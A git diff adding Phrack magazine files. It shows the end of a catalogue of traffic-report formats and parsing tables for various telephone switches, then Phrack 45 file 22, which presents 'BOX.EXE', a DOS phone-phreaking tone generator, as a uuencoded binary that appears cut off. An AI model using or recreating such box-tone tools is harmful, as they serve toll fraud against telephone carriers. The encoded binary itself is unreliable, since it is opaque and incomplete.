+""""""""""""""""""
+
+
+
+ACTION IN LINE 000                      VARIABLE LOWER: 00000 UPPER: 00019
+
+ENTRY   REQUIRED        STRING  NEW     ACTION  TYPE    STARTING  ENDING
+        PHASE                   PHASE                   REGISTER  REGISTER
+---------------------------------------------------------------------------
+
+001     000        /:/          001     076     255     65535     65535
+002     001        /DATA TYPE/  001     078     001     65535     65535
+003     001        /END OF/     000     073     255     65535     65535
+
+
+Example of a TRAFFIC report:
+""""""""""""""""""""""""""""
+
+26 JUNE 86   10:00:00    THT  735    TM GROUPED   DATA DUMP REPORT
+
+TIME OF LAST REPORT:    26 JUNE 78    09:00:00
+
+DATA TYPE               GROUPED DATA
+
+SOTU    572     681
+
+SOTP    434     863
+
+RSOU    894
+
+RSOP    978
+
+GTCA    1       1       2       3       4       5       6
+
+SLA     0       0       0       0       1       1       1
+
+TKTU    631     408     17      358     951     426     324
+        436     384     277     462     46      853     956
+
+TKTP    543     753     783     34      572     294     815
+        426     85      357     392     739     212     142
+
+TK2U    584     282     53      19
+
+BSWU    27      7
+
+QTCU    18
+
+END OF GROUPED DATA DUMP
+
+
+
+***************************************************************************
+----------- THE GTE GTD-1 (Automatic Electric No.1 EAX) Switch-------------
+***************************************************************************
+
+Example of RMT data:
+~~~~~~~~~~~~~~~~~~~
+
+
+
+
+ACTION IN LINE 007                      VARIABLE LOWER: 00000 UPPER: 00079
+
+ENTRY   REQUIRED  STRING        NEW     ACTION  TYPE    STARTING   ENDING
+        PHASE                   PHASE                   REGISTER   REGISTER
+---------------------------------------------------------------------------
+
+001     000     /HO UR/         000     075     255     65535      65535
+002     000     /MS 19/         001     077     001     00020      00039
+003     001     /MS 19/         001     081     001     00101      65535
+004     001     /COUNTS/        001     073     255     65535      65535
+005     001     /MS 21/         002     077     002     00040      00079
+006     002     /MS 21/         002     081     001     00101      65535
+007     002     /COUNTS/        003     073     255     65535      65535
+
+
+
+
+
+Example of TRAFFIC report:
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+I  00  HO UR  1:00:00
+R  00  ME RR   9
+R  00  MS 19   7 COUNTS GREATER THAN 0
+R  00  MS 19   1,01   1152  1,02  1350  1,03  1194
+R  00  MS 19   1,04   1378  1,05  1212  1,06  1231
+R  00  MS 19   1,07   1099
+R  00  MS 21   7 COUNTS GREATER THAN 0
+R  00  MS 21   1,01   397  1,02  570  1,03  574
+R  00  MS 21   1,04   542  1,05  682  1,06  668
+R  00  MS 21   1,07   542
+R  00  MS 22   7 COUNTS GREATER THAN 0
+
+
+**************************************************************************
+--------- THE GTE GTD-2 (Automatic Electric No.2 EAX) Switch -------------
+**************************************************************************
+
+Example of RMT data:
+~~~~~~~~~~~~~~~~~~~
+
+ACTION IN LINE 007                      VARIABLE LOWER: 00000 UPPER: 00079
+
+ENTRY  REQUIRED STRING          NEW     ACTION  TYPE   STARTING ENDING
+       PHASE                    PHASE                  REGISTER REGISTER
+---------------------------------------------------------------------------
+001     000     /S@/            001     084     255     65535   65535
+002     001     /MPTK/          001     078     001     65535   65535
+003     001     /MPSW/          001     078     002     65535   65535
+004     001     /MPLB/          001     078     003     65535   65535
+005     001     /MPMA/          001     078     004     65535   65535
+006     001     /MPLS/          001     078     005     65535   65535
+007     001     /MPSP/          001     078     006     65535   65535
+
+
+Example of TRAFFIC report:
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+S@1900  TDA     MPTK    08-14-86        1900    2000
+
+        TRK     ICT     ICT     ICT     OGT     OGT     OGT     PRE
+        GRP     USAGE   ATT     HITS    USAGE   ATT     OFL     DIAL
+
+        128     0       0       0       31      18      0       0
+        129     0       0       0       32      12      0       0
+        130     0       0       0       0       0       0       0
+        131     0       0       0       486     269     0       0
+        132     0       0       0       55      13      0       0
+        133     317     143     0       264     108     0       0
+        134     0       0       0       1       2       0       0
+
+S@1901  TDA     PMSW    08-14-86        1900    2000
+
+        SVC     USAGE   ATT     OFL
+
+        10      3
+        10      3       164     0
+        11      17      163     0
+        14      302     2523    0
+        15      200     2391    0
+        16      377     2187    0
+        18      84      1171    0
+        19      113     1477    0
+
+
+**************************************************************************
+------------------- The Motorola EMX-250 Switch --------------------------
+**************************************************************************
+
+
+Example of RMT data:
+~~~~~~~~~~~~~~~~~~~
+
+ACTION IN LINE 003                      VARIABLE  LOWER: 00000 UPPER: 00389
+
+ENTRY  REQUIRED    STRING       NEW     ACTION  TYPE    STARTING  ENDING
+        PHASE                   PHASE                   REGISTER  REGISTER
+----------------------------------------------------------------------------
+001     000        /TRA21/      001     078     001     65535     65535
+002     001        / /          002     073     255     65535     65535
+003     002        /^M/         000     078     002     65535     65535
+
+
+
+Example of TRAFFIC report:
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+TRA21   0307    1400    1500
+0369    0000    00
+00129 00045 00178 00127 00000 00000 00000 00000
+00000 00000 00000 00001 00000 00000 00000 00000
+101 000 BBBBBBBBBBBBBBBBBBBBBBBBBB 262 1234 1
+
+TRA30 0307 1400 1500
+0000 0000 00
+00000 00000 00000 00000 00000 00000 00000 00000
+00000 00000 00000 00000 00000 00000 00000 00000
+247 000 BBBBBBBBBBBBBBBBBBBBBBBBBB 262 2134 1
+
+TRA31 0307 1400 1500
+0000 0000 00
+00000 00000 00000 00000 00000 00000 00000 00000
+00000 00000 00000 00000 00000 00000 00000 00000
+253 000 BBBBBBBBBBBBBBBBBBBBBBBBBB 262 1234 1
+
+TRA32 0307 1400 1500
+00000 00000 00000 00000 00000 00000 00000 00000
+00000 00000 00000 00000 00000 00000 00000 00000
+254 000 BBBBBBBBBBBBBBBBBBBBBBBBBB 262 1234 1
+
+
+************************************************************************
+-----------------         NEC ND-20S SWITCH      -----------------------
+************************************************************************
+
+
+Example of RMT data
+"""""""""""""""""""
+
+
+
+ENTRY   REQUIRED   STRING       NEW     ACTION  TYPE    STARTING  ENDING
+        PHASE                   PHASE                   REGISTER  REGISTER
+--------------------------------------------------------------------------
+
+001     000        ///          000     075     255     65535     65535
+002     000        /ORG. CALL/  001     078     001     65535     65535
+003     001        /DUMP END/   000     073     255     65535     65535
+004     000        /SPECIAL DU/ 001     078     002     65536     65535
+
+
+Example of TRAFFIC report
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+
+06/21   20:01   CON-TEST        NG
+PL:1 0 5 4 5 4 6 PT:1 0 3 1 6 4 2
+06/21   20:02   * TRAFFIC NORMAL DUMP *
+
+        COM  ORG. CALL ATTEMPTS (PEG COUNT)
+
+026613  000079  000233   00000 00000 00000 00038
+000000  000114
+
+        COM  ORG. CALL COMPLETED (PEG COUNT)
+
+012172  000049  000113  000047
+
+        OOH  TER. CALL COMPLETED (PEG COUNT)
+
+034146  000142  000000
+
+        OOH  CALLED PARTY BUSY ENCOUNTERED   (PEG COUNT)
+
+003356
+
+06/21   20:04   *NORMAL DUMP END*
+
+
+000000 000000
+
+        00H  CALLED OFFICE   (PEG COUNT)
+
+000000 000000 000000 000000 000000 000000 000000 000000
+
+        OOH  A-LINK     USAGE PER NW BASIS  (CCS)
+
+
+0733.80  0594.40 0000.00 0000.00
+
+        OOH  TRUNK USAGE   (CCS)  OGY
+
+0002.40  0004.20 0009.00 0001.60 0009.60 0002.20 0016.00
+0000.00  0003.00 0000.00 0000.00 0046.80 0000.00 0003.00
+
+06/21   20:22  *SPECIAL DUMP END*
+
+06/21   20:22
+
+
+***************************************************************************
+------------------ Northern Telecom DMS-10 Switch -------------------------
+***************************************************************************
+
+Example of RMT data:
+~~~~~~~~~~~~~~~~~~~
+
+ACTION IN LINE 011                      VARIABLE LOWER: 00000 UPPER: 00560
+
+ENTRY  REQUIRED  STRING         NEW     ACTION  TYPE    STARTING  ENDING
+        PHASE                   PHASE                   REGISTER  REGISTER
+--------------------------------------------------------------------------
+001     000     /OPM001/        000     072     001     65535     65535
+002     000     /OPM002/        000     078     002     65535     65535
+003     000     /OPM003/        000     078     003     65535     65535
+004     000     /OPM004/        000     078     004     65535     65535
+005     000     /OPM005/        000     078     005     65535     65535
+006     000     /OPM006/        000     078     006     65535     65535
+007     000     /OPM007/        000     078     007     65535     65535
+008     000     /OPM008/        000     078     008     65535     65535
+009     000     /OPM009/        000     078     009     65535     65535
+010     000     /OPM010/        000     078     010     65535     65535
+011     000     /OPM011/        000     078     011     65535     65535
+012     000     /OPM012/        000     078     012     65535     65535
+013     000     /OPM013/        000     078     013     65535     65535
+
+
+Example of TRAFFIC report
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+OPM001 TRAF HLST MON   08/19/86   15:00:00  HRHR
+
+                PEG     BLK     USE
+        ORTM    00635   00000   00978
+        OROG    00477   00000   00685
+        ORNC    00089
+        RVRT    00012
+        INTM    00429   00000   00707
+        INOG    00000   00000   00000
+        INNC    00003
+
+OPM002 OSVC HLST MON  11/02/85  15:00:00 HRHR
+
+                PEG
+
+        PSIG    00027
+        PDTO    00015
+        PABN    00092
+        FSTR    00168
+        DGTC    00599
+        DPC     00874
+        TOTC    01473
+                  %
+        DGTS    000.0
+        DPS     000.0
+        TOTS    000.0
+
+
+************************************************************************
+----------------- Northern Telecom DMS-100 Switch ----------------------
+************************************************************************
+
+Example of RMT data
+~~~~~~~~~~~~~~~~~~
+
+ACTION IN LINE 004                      VARIABLE LOWER: 00000 UPPER: 01015
+
+ENTRY   REQUIRED   STRING       NEW     ACTION  TYPE    STARTING   ENDING
+        PHASE                   PHASE                   REGISTER   REGISTER
+---------------------------------------------------------------------------
+001     000        /QWMPR2/     001     075     255     65535      65535
+002     001        /SLOWS/      002     077     001     00020      00999
+003     002        /TRMT2/      003     068     066     65535      65535
+004     002        /ANN^J/      002     068     119     65535      65535
+005     002        /SITE^J/     003     073     255     65535      65535
+006     003        /TRK^J/      004     077     002     01000      04499
+007     004        /KEY/        005     081     019     00027      65535
+008     005        /QFZ^J/      000     077     003     04500      04920
+
+
+Example of TRAFFIC report
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+CMFLINT OMPR213  AUG13  15:01:09     3684       INFO  CM  REPORT
+
+CLASS: NMCTRAFF
+START: 1986/08/13  14:00:00  WED; STOP: 1986/08/13   15:00:00 WED;
+SLOWSAMPLES:         36;  FASTSAMPLES:          360;
+
+CPU
+        MTCHINT   TRAPINT   CPUFLT  SYSWINIT SYSCINIT    SYNCLOSS
+        MSYLOSSU  SSYLOSSU
+ 0           0         0       0       0          0           0
+             0         0
+
+ICO
+
+        IOCERR    IOCLKERR   IOCFLT   IOCLKSBU   IOLKMBU  IOCSBU
+        IOCMBU
+ 0           0         0        0      0          0           0
+             0
+
+CMC
+        KEY (CMC_INDEX)
+        .
+        .
+        .
+
+***********************************************************************
+----------------- Northern Telecom DMS-250 ----------------------------
+***********************************************************************
+
+Example of RMT data
+~~~~~~~~~~~~~~~~~~
+
+ACTION IN LINE 003                      VARIABLE LOWER: 00000 UPPER: 02387
+
+ENTRY     REQUIRED    STRING    NEW   ACTION  TYPE STARTING  ENDING
+          PHASE                 PHASE              REGISTER  REGISTER
+--------------------------------------------------------------------------
+001        000       /QMPR2/    001     072   255  65535     65535
+002        001       /INFO/     002     073   255  65535     65535
+003        002       /SLOWS/    000     078   001  65535     65535
+
+
+
+Example of TRAFFIC data
+~~~~~~~~~~~~~~~~~~~~~~
+
+QMPR18 AUG28  17:00:43 4000 INFO QM REPORT
+        CLASS:SCHOURDC
+        START:1984/08/28  16:00:00  TUE; STOP: 1984/08/28 17:00:00 TUE;
+        SLOWSAMPLES:       36; FASTSAMPLES
+
+TRMT1
+        VACT    UNCA    HNPI    UNDN    BLDN    UNIN
+        TESS
+
+   0     60       0       0       0       0       0
+          0       0       0
+
+TRMT2
+
+        DNTR    CNOT    DCFC    PRSC    GNCT    ATBS
+                MHLD
+
+   0      0       0       0       0       0       0
+          0       0
+
+
+QMPR220 AUG28 17:30:16  6100 INFO REPORT
+        CLASS: ADHOURC
+        START:1984/08/28        17:00:00 TUE; STOP 1984/08/28   18:00:00 TUE;
+        SLOWSAMPLES:    36;     FASTSAMPLES:    360;
+
+TRK
+        KEY (COMMON_LANGUAGE_NAME)
+        INFO (QM2TRKINFO)
+          INCATOT PRERTEAB   INFAIL   NATMPT MOVFLATB   GLARE
+          QUTFAIL DEFLCDA    DREU     PREU   TRU        SBU
+          ANSWER  INVAUTH    CONNECT  TANDEM AQF        ANF
+
+
+*********************************************************************
+---------------- Northern Telecom SL-1 Switch ----------------------
+*********************************************************************
+
+Example of RMT data
+~~~~~~~~~~~~~~~~~~
+
+ACTION IN LINE 005 (RAM)        VARIABLE LOWER: 00000 UPPER: 00010
+
+ENTRY   REQUIRED   STRING       NEW     ACTION  TYPE    STARTING ENDING
+        PHASE                   PHASE                   REGISTER REGISTER
+-------------------------------------------------------------------------
+001     000     /TFS000/        001     073     255     65535    65535
+002     001     /19/            002     073     255     65535    65535
+003     002     / /             000     084     255     65535    65535
+004     001     /TF/            000     073     255     65535    65535
+005     002     /TF/            000     073     255     65535    65535
+006     000     /TFS001/        000     078     001     65535    65535
+007     000     /TFS002/        000     078     002     65535    65535
+008     000     /TFS411/        000     078     141     65535    65535
+009     000     /TFS412/        000     078     142     65535    65535
+010     000     /TFS999/        000     073     255     65535    65535
+
+
+Example of TRAFFIC report
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+001 TFS000
+
+13      10      1978
+10      30      00
+
+001 TFS102
+
+00      0000157 00100
+
+001 TFS102
+
+01      0000194 00100
+
+001 TFS102
+
+02      0000194 00100
+
+.
+.
+.
+
+001     TFS001
+
+00      TERM    00000   0000012 00023   00000   0000157 00161
+01      TERM    00000   0000028 00018   00000   0000256 00157
+02      TERM    00000   0000015 00019   00000   0000194 00134
+06      CONF    00000   0000000 00000   00000   0000001 00003
+07      TDS     00000   0000000 00000   00000   0000000 00000
+ .
+ .
+ .
+
+
+
+************************************************************************
+---------------- Northern Telecom SP-1 PABX Switch ---------------------
+************************************************************************
+
+
+Example of RMT data
+~~~~~~~~~~~~~~~~~~
+
+ACTION IN LINE 013                      VARIABLE LOWER: 00000 UPPER: 00042
+
+ENTRY   REQUIRED  STRING        NEW     ACTION  TYPE    STARTING  ENDING
+        PHASE                   PHASE                   REGISTER  REGISTER
+--------------------------------------------------------------------------
+001     001       /JAN/         002     073     255     65535     65535
+002     001       /FEB/         002     073     255     65535     65536
+003     001       /MAR/         002     073     255     65535     65535
+004     001       /APR/         002     073     255     65535     65535
+005     001       /MAY/         002     073     255     65535     65535
+006     001       /JUN/         002     073     255     65535     65535
+007     001       /JUL/         002     073     255     65535     65535
+008     001       /AUG/         002     073     255     65535     65535
+009     001       /SEP/         002     073     255     65535     65535
+010     001       /OCT/         002     073     255     65535     65535
+011     001       /NOV/         002     073     255     65535     65535
+012     001       /DEC/         002     073     255     65535     65535
+013     002       /19/          000     075     054     65535     65535
+.
+.
+.
+
+Example of TRAFFIC report
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+
+0067  OPR  MEA  00315  013077  18 - 200SUS
+
+LIN#    0       78
+ 2      2       8       0       0       32      0       36      0     2  82
+
+LIN#    1       8
+ 0      0       8       0       0       32      0       0       32     2  0
+
+
+WED 11 SEPT     1980    112777
+
+572     415     23      3       46      160     1992    0
+  0     516      0      0       22        1     2180    0
+
+        0055  OPR  MEA   045331   112044
+
+2420    1713    101     10      327     628     4512    8512    0
+
+ WED  11 SEPT 1980    1:06:27    1606CLS3
+
+
+ .
+ .
+ .
+
+
+***********************************************************************
+--------------- Stromberg Carlson DCO Switch (!!) ---------------------
+***********************************************************************
+
+Example of RMT data
+~~~~~~~~~~~~~~~~~~
+
+ACTION IN LINE 006                      VARIABLE LOWER: 00000 UPPER: 00837
+
+ENTRY   REQUIRED  STRING        NEW     ACTION  TYPE    STARTING ENDING
+        PHASE                   PHASE                   REGISTER REGISTER
+--------------------------------------------------------------------------
+001     000      /COMPLETION/   000     084     255     65535    65535
+002     000      /ROW/          001     077     001     00100    02039
+003     001      /END OF TMR/   000     073     255     65535    65535
+004     001      /***/          002     073     255     65535    65535
+005     002      /^M/           001     066     001     65535    65535
+
+
+Example of a TRAFFIC report
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+SITE:ACD,INC.           GROUP: 1                BUFFER:ACTIVE
+COLLECTION TIME: 08:00:00       05/01/79
+COMPLETION TIME: 08:01:05       05/01/79
+
+ROW     ODD3S   ODTNP
+0       1       2
+1
+        OLOSZ   OLMAT   ORVEC
+2       3       2       1
+        OLOTB   OLOTL   OLOTP   OLMDS   OLMBY
+3       7       2       1       8       3
+
+4
+
+5
+
+...
+.
+.
+.
+.
+
+
+***********************************************************************
+-------------- TRW Vidar ITS 4/5 and ITS 5 Switches -------------------
+***********************************************************************
+
+
+
+Example of RMT data
+~~~~~~~~~~~~~~~~~~
+
+
+ACTION IN LINE 006              VARIABLE LOWER: 00000 UPPER: 00837
+
+ENTRY   REQUIRED   STRING       NEW     ACTION  TYPE    STARTING  ENDING
+        PHASE                   PHASE                   REGISTER  REGISTER
+---------------------------------------------------------------------------
+001     000     /ITD REPORT/    000     073     255     65535     65535
+002     000     / TO /          000     072     001     65535     65535
+003     000     /SYSTEM/        000     078     002     65535     65535
+004     000     /GRADE/         000     078     004     65535     65535
+005     000     /SEPAR/         000     073     004     65535     65535
+006     000     /END/           000     004     255     65535     65535
+
+
+Example of TRAFFIC report
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+TIMED  ITS REPORT   ADAM FROM 08-18-86  13:01:31 TO 08-18-86 14:00:28
+CLEARING COUNTERS
+
+GROUP TOTALS
+
+        NAME    TYPE    ATT     COM     XCS     AVH     OFL
+
+        LSSO    ORIG    131     93      1671    13      0
+        LSSO    TERM    129     98      1729    13      0
+        LSS1    ORIG    159     111     3093    19      0
+        LSS1    TERM    114     97      2793    25      0
+        LSS2    ORIG
+        .
+        .
+        .
+        .
+
+
+*********************************************************************
+------------- Western Electric ESS 5 Switch -------------------------
+*********************************************************************
+
+Example of RMT data
+~~~~~~~~~~~~~~~~~~
+
+ACTION IN LINE 003                      VARIABLE LOWER: 00000 UPPPER: 00100
+
+ENTRY   REQUIRED   STRING       NEW     ACTION  TYPE    STARTING ENDING
+        PHASE                   PHASE                   REGISTER REGISTER
+----------------------------------------------------------------------------
+001     000     /S570/          001     075     255     65535    65535
+002     001     /TION 1:/       002     078     001     65535    65535
+003     002     /TION 3:/       003     078     002     65535    65535
+
+Example of TRAFFIC report
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+S570-108396613 86-05-13  12:01:22  12430
+OP TRFC30 VLD
+  TIME: 12:0:27
+
+SECTION 1: VALIDITY
+
+PROC    DATLOS  SCN10   SCN100
+0       VALID   0       18
+7       VALID   180     18
+10      VALID   180     19
+9       VALID   180     18
+2       VALID   180     18
+6       VALID   180     18
+4       VALID   180     18
+3       VALID   180     18
+8       VALID   180     18
+5       VALID   180     18
+1       VALID   180     18
+11      VALID   180     18
+
+
+S570-108396613  86-05-13 12:01:24  12431
+OP TRFC30 OFC
+  TIME 12:0:27
+
+SECTION 3: OFFICE TOTALS
+
+DPORQ =   46    TTPRQ =  693  DPINRQ =  1226
+MFINRQ=   9577  CDIRR =  58   TCBUSY =  11
+ .
+ .
+ .
+ .
+ .
+
+
+
+----------------------------------------------------------------------------
diff --git a/phrack45/22.txt b/phrack45/22.txt
new file mode 100644
index 0000000..079a970
--- /dev/null
+++ b/phrack45/22.txt
@@ -0,0 +1,219 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 22 of 28
+
+****************************************************************************
+ 
+BOX.EXE - Submitted to Phrack Magazine for your amusement.
+ 
+by The Fixer / 604
+ 
+This is a tiny, minimalist demonstration of several types of box tones.
+No cosmetic bullshit, no command line parameters and no config files.
+ 
+You just type BOX.
+ 
+The only requirements for this program are an IBM PC or compatible and
+an Adlib Music Card or one of its many successors (including all Sound
+Blaster types).  You may need to turn the volume up a bit as the pure
+sinewaves tend to be quieter than other Adlib waveforms.
+ 
+There are keystroke menus in the program.  If you need more help than
+that, you shouldn't be running it.
+ 
+-=( The Fixer of 604 )=-
+ 
+begin 644 box.exe
+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
